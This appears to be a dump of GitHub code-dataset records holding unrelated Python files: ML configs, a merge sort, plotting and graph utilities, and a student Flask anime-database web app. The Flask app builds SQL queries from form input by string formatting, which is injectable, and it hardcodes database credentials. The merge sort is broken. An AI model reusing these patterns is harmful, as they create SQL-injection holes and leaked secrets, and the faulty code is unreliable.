baby networks can afford to go a bit higher\nmax_iters = 30000\nlr_decay_iters = max_iters # make equal to max_iters usually\nmin_lr = 1e-5 # learning_rate / 10 usually\nbeta2 = 0.99 # make a bit bigger because number of tokens per iter is small\n\nwarmup_iters = 100\n","repo_name":"abusch8/PlotBot","sub_path":"nanoGPT/config/train_western_robot_disaster.py","file_name":"train_western_robot_disaster.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1132324198","text":"# 일단 반으로 나누고 합쳐서 정렬\n# n/2로 나누고, 1개의 요소가 남기까지 재귀적으로 divide한다\n# 그 후, 그 다음에 2개씩 요소들을 반복적으로 merge한다 \n\ndef divide(list):\n if len(list) <= 1:\n return list\n mid = len(list) // 2\n left_list = list[:mid]\n right_list = list[mid:]\n left_list = merge(left_list)\n right_list = merge(right_list)\n return merge(left_list,right_list)\n\ndef merge(left,right):\n arr = []\n while len(left)>0 or len(right)>0:\n if len(left)>0 and len(right)>0:\n if left[0] <= right[0]:\n arr.append(left[0])\n left = left[1:]\n else:\n arr.append(right[0])\n right = right[1:]\n elif len(left) > 0:\n arr.append(left[0])\n left = left[1:]\n elif len(right) > 0:\n arr.append(right[0])\n right = right[1:]\n return arr \n","repo_name":"yeye921/algorithm-study","sub_path":"data-structure/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72107151148","text":"from typing import Tuple\nimport torch\nfrom transformers import WhisperTokenizer\n\n\nBOS_TOKEN_ID = 50258\n\n\ndef get_labels_with_prompt(labels: torch.Tensor,\n tokenizer: WhisperTokenizer,\n language: str = \"en\",\n task: str = \"transcribe\",\n no_timestamps: bool = True)-> Tuple[torch.Tensor, int, int]:\n \"\"\"\n --- LEGACY: kept for reference ---\n \n Returns the labels with the prefix and suffix tokens, as well as the number of prefix and suffix tokens.\n `labels_with_prompt` should be used as the `decoder_input_ids` argument for the `forward` method of the model.\n \n Note: n_prefix_tokens should be 4 (BOS, language, task, if_timestamps) and n_suffix_tokens should be 1 (EOS).\n \"\"\"\n \n # Get batch size:\n batch_size = labels.shape[0]\n\n # Get prefix tokens:\n forced_decoder_ids = tokenizer.get_decoder_prompt_ids(language=language, task=task, no_timestamps=no_timestamps) # language, task, if_timestamps\n prefix_tokens = torch.IntTensor([BOS_TOKEN_ID] + [token_id for idx, token_id in forced_decoder_ids]) # (n_prefix_tokens, )\n prefix_tokens = prefix_tokens.expand(batch_size, -1) # (batch_size, n_prefix_tokens)\n\n # Get suffix tokens:\n suffix_tokens = torch.IntTensor([tokenizer.eos_token_id]) # (n_suffix_tokens, )\n suffix_tokens = suffix_tokens.expand(batch_size, -1) # (batch_size, n_suffix_tokens)\n\n # Get prefix and suffix lengths:\n n_prefix_tokens = prefix_tokens.shape[1] # n_prefix_tokens\n n_suffix_tokens = suffix_tokens.shape[1] # n_suffix_tokens\n \n # Send tensors to the same device as the `labels` tensor:\n prefix_tokens = prefix_tokens.to(labels.device)\n suffix_tokens = suffix_tokens.to(labels.device)\n \n # Concatenate the prefix tensor with the original tensor along the second dimension:\n labels_with_prompt = torch.cat((prefix_tokens, labels, suffix_tokens), dim=1) # (batch_size, n_tokens_labels + n_prefix_tokens + n_suffix_tokens)\n\n return labels_with_prompt, n_prefix_tokens, n_suffix_tokens\n\n\ndef get_attention_mask_with_prompt(attention_mask_labels: torch.Tensor,\n n_prefix_tokens: int,\n n_suffix_tokens: int) -> torch.Tensor:\n \"\"\"\n --- LEGACY: kept for reference ---\n \n Returns the attention mask for which the correct mask was added for the prefix and suffix tokens.\n \"\"\"\n \n # Get batch size:\n batch_size = attention_mask_labels.shape[0]\n \n # Get prefix and suffix attention masks:\n attention_prefix = torch.ones(batch_size, n_prefix_tokens) # (batch_size, n_prefix_tokens)\n attention_suffix = torch.ones(batch_size, n_suffix_tokens) # (batch_size, n_suffix_tokens)\n \n # Send tensors to the same device as the `labels` tensor:\n attention_prefix = attention_prefix.to(attention_mask_labels.device)\n attention_suffix = attention_suffix.to(attention_mask_labels.device)\n \n attention_mask_labels_with_prompt = torch.cat([attention_prefix, attention_mask_labels, attention_suffix], dim=1) # (batch_size, n_tokens_labels + n_prefix_tokens + n_suffix_tokens)\n \n return attention_mask_labels_with_prompt\n","repo_name":"tonywu71/distilling-and-forgetting-in-large-pre-trained-models","sub_path":"trainer/prompting.py","file_name":"prompting.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"418979147","text":"class Normalizer:\n def __init__(self, options):\n if options.strip_punctuation:\n self.strip_punctuation_op = lambda tokens: [\n t\n for t in tokens\n if not t.is_punct\n ]\n else:\n self.strip_punctuation_op = lambda tokens: tokens\n\n if options.normalize_digits:\n self.normalize_digits_op = lambda tokens: [\n ('[DIGITS]' if t.is_digit else t)\n for t in tokens\n ]\n else:\n self.normalize_digits_op = lambda tokens: tokens\n\n if options.lower:\n self.lower_op = lambda tokens: [\n t.lower()\n for t in tokens\n ]\n else:\n self.lower_op = lambda tokens: tokens\n\n def normalize(self, sent):\n tokens = list(sent)\n ## SpaCy object ops\n tokens = self.strip_punctuation_op(tokens)\n tokens = self.normalize_digits_op(tokens)\n ## switch to string ops\n tokens = [str(t) for t in tokens]\n tokens = self.lower_op(tokens)\n return tokens\n\nclass CLI:\n @staticmethod\n def addNormalizationOptions(parser):\n parser.add_option('--lower', dest='lower',\n action='store_true', default=False,\n help='lowercase all text')\n parser.add_option('--strip-punctuation', dest='strip_punctuation',\n action='store_true', default=False,\n help='strip punctuation tokens')\n parser.add_option('--normalize-digits', dest='normalize_digits',\n action='store_true', default=False,\n help='normalize digits to [DIGITS]')\n @staticmethod\n def logNormalizationOptions(options):\n return [\n ('Lowercasing', options.lower),\n ('Stripping punctuation', options.strip_punctuation),\n ('Normalizing digits', options.normalize_digits),\n ]\n","repo_name":"drgriffis/text-essence","sub_path":"lib/normalization.py","file_name":"normalization.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"} +{"seq_id":"29723559321","text":"import os\nimport numpy as np\nimport pandas as pd\nimport plotly.io as pio\nimport plotly.graph_objects as go\n\nfrom plotly.subplots import make_subplots\n\n\ndef ohlc_chart(df: pd.DataFrame, plot_ta: bool = False) -> go.Figure:\n \"\"\"Create a OHLC candlestick chart from a ticker dataframe.\n\n Args:\n df (pd.DataFrame): ticker dataframe to plot.\n\n Returns:\n go.Figure: plotly figure.\n \"\"\"\n df.index = pd.to_datetime(df.index, format=\"%Y-%m-%d %H:%M:%S\")\n\n fig = make_subplots(\n rows=2,\n cols=1,\n shared_xaxes=True,\n vertical_spacing=0.03,\n subplot_titles=(\"OHLC\", \"Volume\"),\n row_width=[0.2, 0.7],\n )\n\n fig.add_trace(\n go.Candlestick(\n x=df.index,\n open=df.Open,\n high=df.High,\n low=df.Low,\n close=df.Close,\n name=\"OHLC\",\n ),\n row=1,\n col=1,\n )\n\n fig.add_trace(go.Bar(x=df.index, y=df.Volume, showlegend=False), row=2, col=1)\n\n if plot_ta:\n for k, ta in df.filter(like=\"MA\").items():\n fig.add_trace(go.Scatter(x=df.index, y=ta, name=k))\n\n if \"BB_MIDDLE\" in df.columns:\n fig.add_trace(\n go.Scatter(\n x=df.index, y=df.BB_MIDDLE, line_color=\"black\", name=\"BB_MD\"\n ),\n row=1,\n col=1,\n )\n fig.add_trace(\n go.Scatter(\n x=df.index,\n y=df.BB_UPPER,\n line_color=\"gray\",\n line={\"dash\": \"dash\"},\n name=\"BB_UP\",\n opacity=0.5,\n ),\n row=1,\n col=1,\n )\n fig.add_trace(\n go.Scatter(\n x=df.index,\n y=df.BB_LOWER,\n line_color=\"gray\",\n line={\"dash\": \"dash\"},\n fill=\"tonexty\",\n name=\"BB_LW\",\n opacity=0.5,\n ),\n row=1,\n col=1,\n )\n\n fig.update(layout_xaxis_rangeslider_visible=False)\n\n return fig\n\n\ndef plot_result(\n df: pd.DataFrame,\n y_true: np.array,\n y_hat: np.array,\n path: str,\n mode: str,\n split: float,\n) -> go.Figure:\n \"\"\"Plot the results of the classification or the regression tasks.\n It adds the plots in the candlestick chart.\n\n Args:\n df (pd.DataFrame): data used to do the prediction.\n y_true (np.array): targets.\n y_hat (np.array): predictions.\n path (str): path to store the figure.\n mode (str): clf or reg.\n split (float): plot a vertical line based on the percentage of split\n if it is bigger than 0.\n\n Returns:\n go.Figure: updated figure.\n \"\"\"\n fig = ohlc_chart(df, plot_ta=True)\n\n window = len(df.index) - len(y_true)\n if mode.lower() == \"reg\":\n fig.add_trace(go.Scatter(x=df.index[window:], y=y_true, name=\"Real\"))\n fig.add_trace(go.Scatter(x=df.index[window:], y=y_hat, name=\"Prediction\"))\n elif mode.lower() == \"clf\":\n y = np.where((y_true == 1) & (y_hat == 1), 1, np.nan) * df.Close.mean()\n fig.add_trace(\n go.Scatter(x=df.index[window:], y=y, name=\"Target == Pred\", mode=\"markers\"),\n row=1,\n col=1,\n )\n\n if split > 0.0:\n x = int(len(df.index) * split)\n dt = df.index[x]\n fig.add_vrect(\n x0=dt,\n x1=dt,\n line_dash=\"dash\",\n annotation_text=\"Test set\",\n annotation_position=\"top left\",\n )\n\n if os.path.exists(path) is False:\n os.makedirs(path, exist_ok=True)\n\n pio.write_image(fig, f\"./{path}/figure.png\", width=3840, height=2160)\n return fig\n","repo_name":"presedo93/forestock","sub_path":"tools/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27078216072","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nfrom queue import Queue\n\nwitness=[] # global variable used to record any witness for violation of bipartite graphs\n\n'''\nBFS travel using queue and adjuscency list\n'''\ndef BFSVisit(q, adjL): \n while q.empty()==False: # Do breadth first search until the queue is empty\n \n i=q.get() # dequeue\n if adjL[i][-1]==1: # Determine color of neighbouring vertices of i\n nColor = 2 # if i.color=Black (1), then neigboring vertex color=Green (2)\n else: # else if i.color=Green (2), then neigboring vertex color=Black (1)\n nColor = 1\n for v in adjL[i][0:-1]: # explore each edge out of the current node at index i\n v -= 1 # adjust for index in adjuscency matrix : vertex 1 is stored at index 0\n if adjL[v][-1]==0: # if vertex v is white i.e. unvisited, then color v and enqueue\n adjL[v][-1]=nColor\n q.put(v)\n elif adjL[v][-1]!=nColor: # if v is already in the same color as i, then not a bipartite graph \n global witness\n witness=i,v # record the adjucent vertices in same color as witness\n return -1\n return 0 \n\n\n'''\nKeep two partitions of the bipartite graph in two tuples, and return them\n'''\ndef get_biPartitions(adjL): \n \n black=[] # vertices with color black will be kept here\n green=[] # vertices with color green will be kept here\n\n for i in range(len(adjL)): # for each vertex, look at the color and put in correct list\n if adjL[i][-1]==1:\n black.append(i+1)\n elif adjL[i][-1]==2:\n green.append(i+1)\n return tuple(black),tuple(green) # return as tuples, for printing\n\n\n'''\nMain function to take inputs and determine if the graph is bipartite\n'''\n\nif __name__=='__main__':\n\n n=int(input()) # read number of vertices from input line 1 \n adjL=[[] for _ in range(n)] # initialise adjacency list with length as number of vertices\n for i in range(n): # store adjacency list from next n input lines\n adjL[i]=list(map(int,input().split()))\n \n for i in range(n):\n adjL[i].append(0) # 0 : White. Color each vertex in white.\n\n q=Queue(maxsize=n) # initialise max size of queue as number of vertices\n\n for i in range(n):\n if adjL[i][-1]==0: # Perform BFS traversal for each unvisited vertex (i.e. vertex of color white).\n adjL[i][-1]=1 # 1: Black. The vertex is coloured black\n q.put(i) # enqueue vertex for BFS search\n rc=BFSVisit(q,adjL) # perform breadth first search\n if rc==-1: # if discrepencies found, print the witness, along with the partitions done before discrepency\n black,green=get_biPartitions(adjL)\n print(\"No \",witness, \" are adjacent vertices in bi partitions \", black,green)\n break\n\n if rc==0: # if no discrepencies found from any of the BFS searches \n black,green=get_biPartitions(adjL) # get the partitions of the bipartite graph, and print\n print(\"Yes \",black,green)\n\n","repo_name":"Sujata018/Solution-to-Datastructure-problems","sub_path":"isBipartite.py","file_name":"isBipartite.py","file_ext":"py","file_size_in_byte":3507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26813990915","text":"from config import *\nimport pinecone\n\n# delete all namespaces except the ones in the list\n\nnamespaces_to_keep = [\"test-both-python3\", \"google_drive1\"]\n\n\nindex = pinecone.Index(os.getenv(\"PINECONE_INDEX_NAME\"))\nstats = index.describe_index_stats()\n\nnamespaces = stats[\"namespaces\"].keys()\n\nfor namespace in namespaces:\n if namespace not in namespaces_to_keep:\n print(f\"Deleting namespace {namespace}\")\n index.delete(delete_all=True, namespace=namespace)","repo_name":"rparappuram/python-chatbot","sub_path":"scripts/deleteNamespaces.py","file_name":"deleteNamespaces.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8266265905","text":"from typing import List\nfrom typing import Optional\n\nfrom ...clients.kvmd import KvmdClient\nfrom ...clients.streamer import StreamerClient\n\nfrom ... import htclient\n\nfrom .. import init\n\nfrom .vncauth import VncAuthManager\nfrom .server import VncServer\n\n\n# =====\ndef main(argv: Optional[List[str]]=None) -> None:\n config = init(\n prog=\"kvmd-vnc\",\n description=\"VNC to KVMD proxy\",\n check_run=True,\n argv=argv,\n )[2].vnc\n\n user_agent = htclient.make_user_agent(\"KVMD-VNC\")\n\n VncServer(\n host=config.server.host,\n port=config.server.port,\n max_clients=config.server.max_clients,\n\n no_delay=config.server.no_delay,\n\n tls_ciphers=config.server.tls.ciphers,\n tls_timeout=config.server.tls.timeout,\n\n desired_fps=config.desired_fps,\n keymap_path=config.keymap,\n\n kvmd=KvmdClient(\n user_agent=user_agent,\n **config.kvmd._unpack(),\n ),\n streamer=StreamerClient(\n user_agent=user_agent,\n **config.streamer._unpack(),\n ),\n vnc_auth_manager=VncAuthManager(**config.auth.vncauth._unpack()),\n\n **config.server.keepalive._unpack(),\n ).run()\n","repo_name":"James992927108/Temp_Kvmd_File","sub_path":"Kvmd-code/apps/vnc/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42292557415","text":"# -*- encoding: utf-8 -*-\nimport os\nimport six.moves.cPickle as pickle\nimport numpy as np\nimport configure\nimport json\ntry:\n import cv2 as cv\nexcept:\n raise\n\nclass ImagePkl:\n # 初回\n json_list = {}\n\n def __init__(self):\n cfg = configure.Configure()\n self._configure = cfg.load_config()\n self._data_dir_path = self._configure['data_dir_path']\n self._n_types_target = -1\n self._dump_name = self._configure['pkl_dump_file_name']\n self._image_size = self._configure['image_size']\n\n # data set 用画像が保存されているディレクトリを検索する\n def get_dir_list(self):\n tmp = os.listdir(self._data_dir_path)\n if tmp is None:\n return None\n ret = []\n for x in tmp:\n if os.path.isdir(self._data_dir_path+x):\n if len(os.listdir(self._data_dir_path+x)) >= 2:\n ret.append(x)\n return sorted(ret)\n\n # class id の取得\n def get_class_id(self, fname):\n dir_list = self.get_dir_list()\n dir_name = filter(lambda x:x in fname, dir_list)\n return dir_list.index(dir_name[0])\n\n def get_class_name(self, id):\n dir_list = self.get_dir_list()\n return dir_list[id]\n\n def set_code_name(self, name, id):\n self.json_list[str(id)] = name\n\n def create_data_target(self):\n dir_list = self.get_dir_list()\n ret = {}\n target = []\n data = []\n print(\"create pkl data\")\n for i, dir_name in enumerate(dir_list):\n file_list = os.listdir(self._data_dir_path + dir_name)\n for file_name in file_list:\n root, ext = os.path.splitext(file_name)\n if ext.upper() == '.JPG':\n abs_name = self._data_dir_path + dir_name + '/' + file_name\n class_id = self.get_class_id(abs_name)\n self.set_code_name(dir_name, class_id)\n target.append(class_id)\n image = cv.imread(abs_name)\n image = cv.resize(image, (self._image_size, self._image_size))\n image = image.transpose(2, 0, 1)\n image = image/255.\n data.append(image)\n data = np.array(data, np.float32)\n target = np.array(target, np.int32)\n self._dump_dataset(data, target)\n self._dump_json_code()\n print(\"done\")\n\n def _dump_json_code(self):\n json.dump(self.json_list,\n open('./models/code_name.json', 'wb'),\n ensure_ascii=False)\n\n def _dump_dataset(self, data, target):\n pickle.dump((data, target), open(self._dump_name, 'wb'), -1)\n\n def load_dataset(self):\n data, target = pickle.load(open(self._dump_name, 'rb'))\n return data, target\n","repo_name":"rusla-tt/ConvolutionImage","sub_path":"app/lib/ImagePkl.py","file_name":"ImagePkl.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73428879466","text":"print (\"Introduzca dos números: \\n\")\r\n\r\nwhile True: #ciclo indeterminado para comprobar que los valores introducidos con correctos, es decir, números reales\r\n\r\n\ttry:\r\n\t\tnumero_1 = float(input (\"Introduce el primer número: \"))\r\n\t\tnumero_2 = float(input (\"Introduce el segundo número: \"))\r\n\t\tbreak\r\n\texcept:\r\n\t\tprint (\"El valor introducido no es un número. \\n Introduzca un valor correcto:\")\r\n\r\n\r\ndef diferentes(num_1,num_2):\r\n\t\"\"\"función que establece si los números son diferentes y, en tal caso, indica cual es mayor\"\"\"\r\n\r\n\tif num_1 != num_2 and num_1 > num_2:\r\n\t \treturn print (\"El primer número introducido: \"+ str(num_1) + \" es mayor que el segundo número introducido: \"+ str(num_2) + \"\\n\")\r\n\telse:\r\n\t\treturn\tprint(\"El segundo número introducido: \"+ str(num_2) + \" es mayor o igual que el primer número introducido: \"+ str(num_1) + \"\\n\")\r\n\r\n\r\ndef iguales (num_1,num_2):\r\n\t\"\"\"función que establece si los números son iguales\"\"\"\r\n\r\n\tif num_1 == num_2:\r\n\t\treturn print (\"\\nLos números introducidos son iguales \\n\")\r\n\telse:\r\n\t\treturn print (\"\\nlos números introducidos son diferentes \\n\")\r\n\r\niguales(numero_1,numero_2)\r\ndiferentes(numero_1,numero_2)\r\n\r\n\t\r\n\t\r\n\r\n","repo_name":"Txus77/theegg_ai","sub_path":"tarea_95/ejercicio_1.py","file_name":"ejercicio_1.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19182490417","text":"#!/usr/bin/env python2.7\n\n\"\"\"\nColumbia's COMS W4111.001 Introduction to Databases\nExample Webserver\n\nTo run locally:\n\n python server.py\n\nGo to http://localhost:8111 in your browser.\n\nA debugger such as \"pdb\" may be helpful for debugging.\nRead about it online.\n\"\"\"\n\nimport os\nfrom sqlalchemy import *\nfrom sqlalchemy.pool import NullPool\nfrom flask import Flask, request, render_template, g, redirect, Response\n\ntmpl_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'templates')\napp = Flask(__name__, template_folder=tmpl_dir)\n\n\n#\n# The following is a dummy URI that does not connect to a valid database. You will need to modify it to connect to your Part 2 database in order to use the data.\n#\n# XXX: The URI should be in the format of:\n#\n# postgresql://USER:PASSWORD@104.196.18.7/w4111\n#\n# For example, if you had username biliris and password foobar, then the following line would be:\n#\n# DATABASEURI = \"postgresql://biliris:foobar@104.196.18.7/w4111\"\n#\nDATABASEURI = \"postgresql://jc5067:5777@34.73.21.127/proj1part2\"\n\n\n#\n# This line creates a database engine that knows how to connect to the URI above.\n#\nengine = create_engine(DATABASEURI)\n\n#\n# Example of running queries in your database\n# Note that this will probably not work if you already have a table named 'test' in your database, containing meaningful data. This is only an example showing you how to run queries in your database using SQLAlchemy.\n#\n#engine.execute(\"\"\"CREATE TABLE IF NOT EXISTS test (\n# id serial,\n# name text\n#);\"\"\")\n#engine.execute(\"\"\"INSERT INTO test(name) VALUES ('grace hopper'), ('alan turing'), ('ada lovelace');\"\"\")\n\n\n@app.before_request\ndef before_request():\n \"\"\"\n This function is run at the beginning of every web request\n (every time you enter an address in the web browser).\n We use it to setup a database connection that can be used throughout the request.\n\n The variable g is globally accessible.\n \"\"\"\n try:\n g.conn = engine.connect()\n except:\n print(\"uh oh, problem connecting to database\")\n import traceback; traceback.print_exc()\n g.conn = None\n\n@app.teardown_request\ndef teardown_request(exception):\n \"\"\"\n At the end of the web request, this makes sure to close the database connection.\n If you don't, the database could run out of memory!\n \"\"\"\n try:\n g.conn.close()\n except Exception as e:\n pass\n\n\n#\n# @app.route is a decorator around index() that means:\n# run index() whenever the user tries to access the \"/\" path using a GET request\n#\n# If you wanted the user to go to, for example, localhost:8111/foobar/ with POST or GET then you could use:\n#\n# @app.route(\"/foobar/\", methods=[\"POST\", \"GET\"])\n#\n# PROTIP: (the trailing / in the path is important)\n#\n# see for routing: http://flask.pocoo.org/docs/0.10/quickstart/#routing\n# see for decorators: http://simeonfranklin.com/blog/2012/jul/1/python-decorators-in-12-steps/\n#\n@app.route('/')\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route('/anime')\ndef anime():\n return render_template('anime.html')\n\n\n@app.route('/anime_search_result', methods=['POST'])\ndef anime_search_result():\n startdate = request.form['startdate']\n enddate = request.form['enddate']\n airing = request.form['air']\n producer = request.form.getlist('producer')\n licensor = request.form.getlist('licensor')\n if startdate == '': startdate = '1900-01-01'\n if enddate == '': enddate = '2019-01-01'\n query = '''\n SELECT DISTINCT A.title\n FROM anime_created_by A, producer P, anime_status_updated_by B\n WHERE A.anime_id = B.anime_id AND A.producer_id = P.producer_id AND\n A.date > DATE ('{}') AND A.date < DATE ('{}')\n '''.format(startdate, enddate)\n if airing == 'yes': query += ' AND B.airing = True'\n elif airing == 'no': query += ' AND B.airing = False'\n if 'All' not in producer:\n producer = list(map(lambda x: \"'\"+x+\"'\", producer))\n query += ' AND (P.studio = ' + ' OR P.studio = '.join(producer) + ')'\n if 'All' not in licensor:\n licensor = list(map(lambda x:\"'\"+x+\"'\", licensor))\n query += ' AND (P.licensor = ' + ' OR P.licensor = '.join(licensor) + ')'\n #print(query)\n try:\n cursor = g.conn.execute(query)\n except Exception as e:\n return render_template(\"error.html\",error = e)\n animeOutput = []\n for anime in cursor:\n animeOutput.append(anime[0])\n cursor.close()\n if animeOutput == []:\n return render_template('noresult.html')\n else:\n anime_score = dict()\n anime_sub = dict()\n anime_view = dict()\n for anime in animeOutput:\n query = ''' \n SELECT P.score, P.subscriptions, P.num_viewed, AVG(P.score), AVG(P.subscriptions), AVG(P.num_viewed)\n FROM popularity P, rated_by R, anime_created_by A\n WHERE P.rank = R.rank AND R.anime_id = A.anime_id AND A.title = '{}'\n GROUP BY P.score, P.subscriptions, P.num_viewed\n '''.format(anime)\n cursor = g.conn.execute(query)\n for r in cursor:\n anime_score[anime] = r[0]\n anime_sub[anime] = r[1]\n anime_view[anime] = r[2]\n avg_score = r[3]\n avg_sub = r[4]\n avg_num_viewed = r[5]\n cursor.close()\n context = dict(animeOutput = animeOutput, anime_score = anime_score, anime_sub = anime_sub, anime_view = anime_view, avg_score = avg_score, avg_sub = avg_sub, avg_num_viewed = avg_num_viewed)\n return render_template(\"anime_search_result.html\", **context)\n\n \n@app.route('/anime_stat')\ndef anime_stat():\n query = '''\n SELECT MAX(P.score), MAX(P.subscriptions), MAX(P.num_viewed)\n FROM anime_created_by A, rated_by R, popularity P\n WHERE A.anime_id = R.anime_id AND R.rank = P.rank;\n '''\n cursor = g.conn.execute(query)\n for r in cursor:\n max_score = r[0]\n max_sub = r[1]\n max_view = r[2]\n cursor.close()\n query = '''\n SELECT A.title\n FROM anime_created_by A, rated_by R, popularity P\n WHERE A.anime_id = R.anime_id AND R.rank = P.rank AND P.score = '{}';\n '''.format(max_score)\n #print(query)\n cursor = g.conn.execute(query)\n for r in cursor:\n max_score_anime = r[0]\n cursor.close()\n query = '''\n SELECT A.title\n FROM anime_created_by A, rated_by R, popularity P\n WHERE A.anime_id = R.anime_id AND R.rank = P.rank AND P.subscriptions = '{}';\n '''.format(max_sub)\n cursor = g.conn.execute(query)\n for r in cursor:\n max_sub_anime = r[0]\n cursor.close()\n query = '''\n SELECT A.title\n FROM anime_created_by A, rated_by R, popularity P\n WHERE A.anime_id = R.anime_id AND R.rank = P.rank AND P.num_viewed = '{}';\n '''.format(max_view)\n cursor = g.conn.execute(query)\n for r in cursor:\n max_view_anime = r[0]\n cursor.close()\n \n highest_score = [max_score_anime, max_score]\n largest_sub = [max_sub_anime, max_sub]\n largest_view = [max_view_anime, max_view]\n context = dict(highest_score = highest_score, largest_sub = largest_sub, largest_view = largest_view)\n return render_template('anime_stat.html', **context)\n\n\n@app.route('/anime_stat_search_result', methods=['POST'])\ndef anime_stat_search():\n low_score = request.form['low_score']\n sub_level = request.form['sub_level']\n view_level = request.form['view_level']\n query = '''\n SELECT DISTINCT A.title\n FROM popularity P, rated_by R, anime_created_by A\n WHERE P.rank = R.rank AND R.anime_id = A.anime_id\n '''\n if not low_score == '':\n low_score = float(low_score)\n query += ' AND P.score > {}'.format(low_score)\n if not sub_level == '':\n sub_level = int(sub_level)\n query += ' AND P.subscriptions > {}'.format(sub_level)\n if not view_level == '':\n view_level = int(view_level)\n query += ' AND P.num_viewed > {}'.format(view_level)\n try:\n cursor = g.conn.execute(query)\n except Exception as e:\n return render_template(\"error.html\",error = e)\n animeOutput = []\n for anime in cursor:\n animeOutput.append(anime[0])\n cursor.close()\n if animeOutput == []:\n return render_template('stat_noresult.html')\n else:\n anime_score = dict()\n anime_sub = dict()\n anime_view = dict()\n for anime in animeOutput:\n query = ''' \n SELECT P.score, P.subscriptions, P.num_viewed, AVG(P.score), AVG(P.subscriptions), AVG(P.num_viewed)\n FROM popularity P, rated_by R, anime_created_by A\n WHERE P.rank = R.rank AND R.anime_id = A.anime_id AND A.title = '{}'\n GROUP BY P.score, P.subscriptions, P.num_viewed\n '''.format(anime)\n cursor = g.conn.execute(query)\n for r in cursor:\n anime_score[anime] = r[0]\n anime_sub[anime] = r[1]\n anime_view[anime] = r[2]\n avg_score = r[3]\n avg_sub = r[4]\n avg_num_viewed = r[5]\n cursor.close()\n context = dict(animeOutput = animeOutput, anime_score = anime_score, anime_sub = anime_sub, anime_view = anime_view, avg_score = avg_score, avg_sub = avg_sub, avg_num_viewed = avg_num_viewed)\n return render_template(\"anime_stat_search_result.html\", **context)\n \n@app.route('/user')\ndef user():\n return render_template(\"user.html\")\n \n@app.route('/result2',methods =['POST'])\ndef result2():\n country = request.form['country']\n gender = request.form['gender']\n birth1 = request.form['birth1']\n birth2 = request.form['birth2']\n air = request.form['air']\n access_date = request.form['access_date']\n query = ''' \n SELECT U.username\n FROM user_lives_at U, location L, access C, anime_status_updated_by A1\n WHERE U.user_id = C.user_id AND L.location_id = U.location_id AND A1.anime_id = C.anime_id\n '''\n if not country == 'All':\n query += '''\n AND L.country = '{}'\n '''.format(country)\n if not gender == 'All':\n query += '''\n AND U.gender = '{}'\n '''.format(gender)\n if not air == 'All':\n query += '''\n AND A1.airing = '{}'\n '''.format(air)\n if not access_date == '':\n query += '''\n AND C.since > '{}'\n '''.format(access_date)\n if not birth1 == '':\n query += '''\n AND U.birthdate > DATE '{}'\n '''.format(birth1)\n if not birth2 == '':\n query += '''\n AND U.birthdate < DATE '{}'\n '''.format(birth2)\n query += ' GROUP BY U.username'\n #print(query)\n try:\n cursor = g.conn.execute(query)\n except Exception as e:\n return render_template(\"error.html\",error = e)\n users = []\n for result in cursor:\n users.append(result[0])\n #print(users)\n cursor.close()\n if users == []:\n context = dict(num_user='No User', avg_anime='')\n #print('DASHFGIAYEFGIEYA')\n else:\n num_anime = 0\n num_user = len(users)\n for user in users:\n query = ''' \n SELECT COUNT(C.anime_id)\n FROM user_lives_at U, access C\n WHERE U.user_id = C.user_id AND U.username = '{}'\n '''.format(user)\n cursor = g.conn.execute(query)\n for r in cursor:\n num_anime += int(r[0])\n context = dict(num_user='Number of users: ' + str(num_user), avg_anime='Average number of animes watched:'+str(num_anime / num_user))\n return render_template(\"user.html\", **context)\n\n\n@app.route('/explore')\ndef explore():\n cursor = g.conn.execute('''\n SELECT DISTINCT A.title\n FROM anime_created_by A, producer P\n WHERE A.producer_id = P.producer_id AND\n A.date > DATE ('2008-11-11') AND (P.studio = 'Satelight');\n ''')\n a = []\n for result in cursor:\n a.append(result[0])\n cursor.close()\n context1 = dict(data1 = a)\n\n cursor = g.conn.execute('''\n SELECT COUNT(DISTINCT user_id)\n FROM access U JOIN anime_status_updated_by A ON U.anime_id = A.anime_id\n WHERE A.airing = FALSE;\n ''')\n b = []\n for result in cursor:\n b.append(result[0])\n cursor.close()\n context2 = dict(data2 = b)\n\n cursor = g.conn.execute('''\n SELECT AVG(P.score)\n FROM popularity P JOIN rated_by R ON P.rank = R.rank\n WHERE P.num_viewed > 10000;\n ''')\n c = []\n for result in cursor:\n c.append(result[0])\n cursor.close()\n context3 = dict(data3 = c)\n return render_template(\"explore.html\", **context1, **context2, **context3)\n\n\n\n# Example of adding new data to the database\n@app.route('/add', methods=['POST'])\ndef add():\n name = request.form['name']\n g.conn.execute('INSERT INTO test VALUES (NULL, ?)', name)\n return redirect('/')\n\n\n@app.route('/login')\ndef login():\n abort(401)\n this_is_never_executed()\n\n\nif __name__ == \"__main__\":\n import click\n\n @click.command()\n @click.option('--debug', is_flag=True)\n @click.option('--threaded', is_flag=True)\n @click.argument('HOST', default='0.0.0.0')\n @click.argument('PORT', default=8111, type=int)\n def run(debug, threaded, host, port):\n \"\"\"\n This function handles command line parameters.\n Run the server using:\n\n python server.py\n\n Show the help text using:\n\n python server.py --help\n\n \"\"\"\n\n HOST, PORT = host, port\n 